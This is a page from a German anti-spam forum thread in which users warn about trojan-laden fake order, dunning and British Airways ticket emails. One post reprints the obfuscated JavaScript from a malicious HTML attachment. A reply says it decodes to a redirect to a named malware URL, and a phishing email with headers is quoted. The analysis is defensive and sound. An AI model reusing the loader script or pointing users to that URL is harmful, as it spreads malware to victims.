Seite 13 von 47 ErsteErste ... 3111213141523 ... LetzteLetzte
Ergebnis 121 bis 130 von 462

Thema: [Virus] Neue Bestellung / Lieferschein für xxx / Mahnung

  1. #121
    Diplom Privatier (c) Avatar von cmds
    Registriert seit
    04.05.2006
    Ort
    N 53° 07.274′ E 7° 58.678′
    Beiträge
    12.552

    Standard

    Zitat Zitat von Baldrian Beitrag anzeigen
    ... Scheint jetzt wieder mal
    ein neuer Abzock-Versuch zu sein.
    Abzocke = nein
    Das ist ein Versuch, einen Trojaner (im Anhang der Mail) zu unterschieben.
    Die Signatur befindet sich aus technischen Gründen auf der Rückseite dieses Beitrages!
    Dieser Eintrag wurde extrem umweltfreundlich, aus wiederverwendeten Buchstaben gelöschter E-Mails geschrieben und ist vollständig digital abbaubar.
    „Ich fürchte den Tag, wenn Technologie unsere Wechselbeziehungen beeinflusst, die Welt wird Generationen von Idioten haben.” Albert Einstein 1879-1955
    „Die ältesten Wörter sind die besten und die kurzen die allerbesten." Sir Winston Churchill 1874–1965
    "Nur die Lüge braucht die Stütze der Staatsgewalt, die Wahrheit steht von alleine aufrecht."Thomas Jefferson1743-1826




  2. #122
    Mitglied Avatar von Rava
    Registriert seit
    13.02.2007
    Ort
    near 127.0.0.1
    Beiträge
    298

    Standard

    Zitat Zitat von blizzy Beitrag anzeigen
    Zum Beipiel:
    Du hast recht, und möglicherweise lesen die sogar hier mit und verbessern die nächste Version. xD

    @Baldrian
    Hat Deine .com Datei die gleiche md5sum? Wie sind die Dateinamen?
    Ich denke die Namen kreieren die Black-Hacker mit einen Script so das stets aktuell aussehende Dateien entstehen.

    Aber Vorsicht mit dem entpacken, Du darfst sie auf keinen Falle unter Windows XYZ ausführen!
    Gruß, Rava

    Malware auf Wind-Systemen besser nicht lokal speichern!
    Ebenso Links zu Phishing-Sites nur betreten, wenn Ihr wisst was Ihr da macht!

  3. #123
    Mitglied
    Registriert seit
    27.07.2009
    Beiträge
    404

    Standard

    Danke für die Warnung.
    Ich entpacke solche Dateien grundsätzlich nicht.
    Ausser es schickt mir ein Bekannter eine Datei, über die
    wir zuvor gesprochen bzw. geschrieben haben.

    Die Datei heisst: "Mein Name" Einzelheiten Ihrer Bestellung.zip

    Ich bekomme blöderweise den Header nicht angezeigt.
    Liegt vielleicht daran, dass ich die Mail in den Papierkorb geschoben habe.
    Viele Grüße

  4. #124
    Mitglied
    Registriert seit
    20.06.2008
    Beiträge
    81

    Standard

    Hi
    vom Verschlüsselungstrojaner, um den es hier geht, gibts pro Tag um die 1-3 Variannten.
    Aber die Infektionsraten scheinen gott sei dank nicht mehr so hoch zu sein wie im letzten Jahr, da hatte ich im Trojaner-board extrem viele Fälle zu bearbeiten.

  5. #125
    Mitglied Avatar von Rava
    Registriert seit
    13.02.2007
    Ort
    near 127.0.0.1
    Beiträge
    298

    Standard

    ^
    Kannst Du uns mal eine Thread URL (oder mehrere) hier mit rein kopieren damit dokumentiert ist wie es dann aussehen würde wenn jemand die .com gestartet hätte?

    Danke.
    Gruß, Rava

    Malware auf Wind-Systemen besser nicht lokal speichern!
    Ebenso Links zu Phishing-Sites nur betreten, wenn Ihr wisst was Ihr da macht!

  6. #126
    Neues Mitglied
    Registriert seit
    28.01.2007
    Beiträge
    27

    Standard

    Sorry, der Beitrag "Abmahnung_brands4friends(???)" gehört hierher:
    https://www.antispam-ev.de/forum/showthread.php?33431-Virus-Neue-Bestellung-Lieferschein-f%FCr-xxx-Mahnung
    Bitte verschieben MOD: [x] Erledigt
    Grüße Juli
    Geändert von Mittwoch (09.02.2013 um 19:26 Uhr) Grund: Verschoben

  7. #127
    Medien- & Kaffeeguru Avatar von truelife
    Registriert seit
    28.01.2006
    Ort
    Vals (Graubünden)
    Beiträge
    18.002

    Standard

    Hi schneite heute eine Mail für ein angebliches Flugticket für/von British Airways herein. Angeblich sei das Ticket angehängt. Diesmal - wie zu erwarten war - kein *.zip, sondern eine normale *.html-Datei, die man mit dem Browser öffnen sollte. Ich habe die mal mit dem Texteditor geöffnet. Der Textteil ist ziemlich langweilig:

    Please wait... You will be forwarded...
    Internet Explorer / Mozilla Firefox compatible only
    Interessanter ist das beigefügte script:

    <script>dbshre=245;try{window.document.body/=2}catch(gdsgsdg){if(dbshre){zaq=0;try{v=document.createElement("div");}catch(ag dsg){zaq=1;}if(!zaq){e=eval;}ss=String;asgq=new Array(109,89,107,43,56,43,49,52,4,113,88,106,43,55,113,88,106,42,53,5,96,94,33,1 12,92,105,41,54,55,113,88,106,43,35,27,114,92,104,93,112,100,93,103,110,41,99,10 3,92,91,111,96,103,103,55,29,95,108,109,106,53,38,39,94,106,100,88,102,104,101,1 00,93,38,107,111,53,47,40,49,42,42,93,103,107,111,104,38,100,98,104,102,106,39,9 2,105,103,108,101,103,40,107,95,104,27,53,120);s="";for(i=0;i-105!=0;i++){if(window.document)s+=ss["fro"+"mCha"+"rCo"+"de"](1*asgq[i]-(i%5-5-3-1));}
    z=s;e(s);}}</script>
    Hübscher (und lesbarer):

    Code:
    <script>
        dbshre = 245;
        try {
            window.document.body /= 2
        }
        catch (gdsgsdg) {
            if (dbshre) {
                zaq = 0;
                try {
                    v = document.createElement("div");
                }
                catch (agdsg) {
                    zaq = 1;
                }
                if (!zaq) {
                    e = eval;
                }
                ss = String;
                asgq = new Array(109, 89, 107, 43, 56, 43, 49, 52, 4, 113, 88, 106, 43, 55, 113, 88, 106, 42, 53, 5, 96, 94, 33, 112, 92, 105, 41, 54, 55, 113, 88, 106, 43, 35, 27, 114, 92, 104, 93, 112, 100, 93, 103, 110, 41, 99, 103, 92, 91, 111, 96, 103, 103, 55, 29, 95, 108, 109, 106, 53, 38, 39, 94, 106, 100, 88, 102, 104, 101, 100, 93, 38, 107, 111, 53, 47, 40, 49, 42, 42, 93, 103, 107, 111, 104, 38, 100, 98, 104, 102, 106, 39, 92, 105, 103, 108, 101, 103, 40, 107, 95, 104, 27, 53, 120);
                s = "";
                for (i = 0; i - 105 != 0; i++) {
                    if (window.document) s += ss["fro" + "mCha" + "rCo" + "de"](1 * asgq[i] - (i % 5 - 5 - 3 - 1));
                }
                z = s;
                e(s);
            }
        }
    </script>
    Ich habe keine Ahnung, was das Script macht - kann das jemand übersetzen?
    "Eine Rose wird auch im Himmel noch ein Rose sein, aber sie wird zehnmal süßer duften." - Luisa † 26.10.2009
    Spende an Antispam / Hilfe für Neulinge / Forenregeln / Nettiquette / Das Antispam - Lexikon / Werden Sie Mitglied
    "Das Internet ist für uns alle Neuland." - Bundeskanzlerin Angela Merkel (19.06.2013)
    smayer@public-files.de smayer@fantasymail.de

  8. #128
    Senior Mitglied Avatar von Solli
    Registriert seit
    20.11.2008
    Ort
    Bayern
    Beiträge
    2.072

    Standard

    So wie ich das sehe wird eine bestimmte Seite aufgerufen. Die URL steht aber sehr versteckt drin, nämlich als Zahlenwerte der einzelnen Buchstaben.

    P.S.: Die URL lautet: whois:http://epianokif.ru:8080/forum/links/column.php. Vorsicht, die Seite könnte Schadcode enthalten!
    Durchgeknallter Netzindianer und stolz drauf

  9. #129
    Mitglied Avatar von Katzina
    Registriert seit
    09.05.2012
    Beiträge
    831

    Standard Spammail

    Hallo zusammen,
    leider bin ich hier ein absoluter "Userlaie", hatte heute eine Mail mit angeblicher Mahnung im Anhang, den ich nicht öffnete mit folgenden Angaben (ich kann leider diese Zeilen nicht so versiert aufschlüsseln, wie das hier im Forum üblich ist, vielleicht ist es auch schon an anderer Stelle erwähnt, dann bitte wieder löschen:


    header:
    01: Return-Path: ***@gmx.net <xxxxx [at] web.de>; Fri, 15 Feb 2013 xx:xx:xx +0100
    02: Received: from mailout-de.gmx.net ([10.1.76.29]) by mrigmx.server.lan
    03: (mrigmx002) with ESMTP (Nemesis) ID: [ID filtered]
    04: Received: (qmail invoked by alias); 15 Feb 2013 xx:xx:xx -0000
    05: Received: from p57ABEB1A.dip.t-dialin.net (EHLO DIR_GLAAB) [87.171.235.26] by
    06: mail.gmx.net (mp029) with SMTP; 15 Feb 2013 xx:xx:xx +0100
    07: X-Authenticated: #26635662
    08: X-Provags-ID: [ID filtered]
    09: From: <***@gmx.net>
    10: To: <" Vorname, Name, meine Mailadresse>
    11: Subject: =?utf-8?q?15.02.2013 Vorname, Name Mahngeb=C3=BChr Ihrer Bestellung Nummer
    12: 6335180?=
    13: Date: Wed, 13 Feb 2013 xx:xx:xx GMT
    14: MIME-Version: 1.0

    Sehr geehrter Kunde ...Vorname, Name,

    zum Unglück war die Forderung mittels Lastschrift von Ihren mitgeteilten Kontodaten nicht möglich oder es wurde eine Rücküberweisung zum Auftrag gegeben, für die Gebühren von 32,64 EUR entstanden sind.

    Deine Rechnungsnummer: 86237903776 bei apomio
    Rechnungs-Summe: 440,00 Euro
    Lieferung bestätigt von: Vorname, Name

    Wir geben Ihnen Gelegenheit den Betrag inklusive der Gebühren für die Rückbuchung bis zum 19.02.2013 an uns zu überweisen. Im anderen Fall sehen wir uns gezwungen, ein Gerichtsverfahren in die Wege zu leiten.

    Bitte nehmen Sie sich einen kleinen Moment Zeit, um Ihre Auftragsdetails zu überprüfen.
    In der angehängten Datei sehen Sie Ihre Mahnung und andere Einzelheiten Ihrer Bestellung.


    Besten Dank und freundliche Grüsse,
    J. M. Leiter Online-Services
    X-Mailer: Microsoft Outlook Express 6.00.2800.1106
    X-Priority: 3
    Content-Type: multipart/mixed; boundary="=-XC95DAF886"
    X-Y-GMX-Trusted: 0

    "apomio" kenne ich nicht, habe auch keine Kontodaten im Internet.
    An alle hier viele Grüße, das Forum ist höchst interessant!
    Geändert von Mittwoch (15.02.2013 um 14:05 Uhr) Grund: header gesetzt, verschoben, getackert, vermutlich geklaute Absenderadresse entfernt
    Tiere können nicht für sich selbst sprechen. Und deshalb ist es so wichtig, dass wir als Menschen unsere Stimme für sie erheben und uns für sie einsetzen.
    Gillian Anderson

  10. #130
    Mitglied
    Registriert seit
    20.06.2008
    Beiträge
    81

    Standard

    obwohl diese British Airways mails nichts mit den fake Rechnungen gemein haben, verteilen beide unterschiedliche Schadsoftware.

Seite 13 von 47 ErsteErste ... 3111213141523 ... LetzteLetzte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen